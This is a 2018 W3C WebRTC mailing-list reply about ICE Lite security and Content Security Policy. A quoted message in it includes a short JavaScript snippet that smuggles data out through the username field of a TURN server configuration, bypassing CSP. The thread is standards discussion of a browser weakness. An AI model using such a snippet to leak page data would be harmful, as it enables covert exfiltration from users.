- From: Iñaki Baz Castillo <ibc@aliax.net>
- Date: Fri, 12 Jan 2018 13:27:02 +0100
- To: Sergio Garcia Murillo <sergio.garcia.murillo@gmail.com>
- Cc: T H Panton <thp@westhawk.co.uk>, "public-webrtc@w3.org" <public-webrtc@w3.org>, Cullen Jennings <fluffy@iii.ca>
On 12 January 2018 at 13:06, Sergio Garcia Murillo
<sergio.garcia.murillo@gmail.com> wrote:
> On 12/01/2018 13:01, Iñaki Baz Castillo wrote:
>
> To summarize: The current issue with ICE Lite is that it's not needed
>
> for the browser (ICE controlling) to provide the remote with the
> browser *internally* and *dynamically* generated tokens (such as the
> ice-ufrag). With my proposal above, this would change so the JS should
> always signal its local ice-ufrag to the remote (otherwise ICE
> responses would be discarded). And for that, the JS must send it via
> HTTP/WebSocket, so habemus CSP rules to block them.
>
> As I already pointed out in the issue, it is possible to leak small amounts
> of data just with:
>
> var pc = new
> RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
> pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
And as I already pointed out, my proposal above was just intended to
make both, Full ICE and ICE Lite, equally safe. :)
Leaking data via TURN credentials is a different subject (not less important).
Received on Friday, 12 January 2018 12:27:46 UTC